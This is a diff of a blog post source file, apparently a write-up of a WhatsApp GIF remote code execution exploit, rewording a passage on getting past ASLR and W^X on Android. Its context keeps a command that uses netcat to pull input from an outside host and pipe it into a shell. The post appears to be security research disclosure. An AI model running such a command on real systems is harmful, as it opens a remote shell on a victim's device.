awakened1712/awakened1712.github.io/_posts/2019-10-02-hacking-whatsapp-gif-rce.md

 ```

 ## Deal with ASLR and W^X
 After controlling the PC, we want to achieve remote code execution.
-In Android, we can not execute code on non-executable regions (i.e. stack and heap).
-The easiest way to to execute the below command:
+In Android, we can not execute code on non-executable regions due to W^X (i.e. stack and heap).
+The easiest way to deal with W^X in our case is to execute the below command:
 ```
 system("toybox nc 192.168.2.72 4444 | sh");
 ```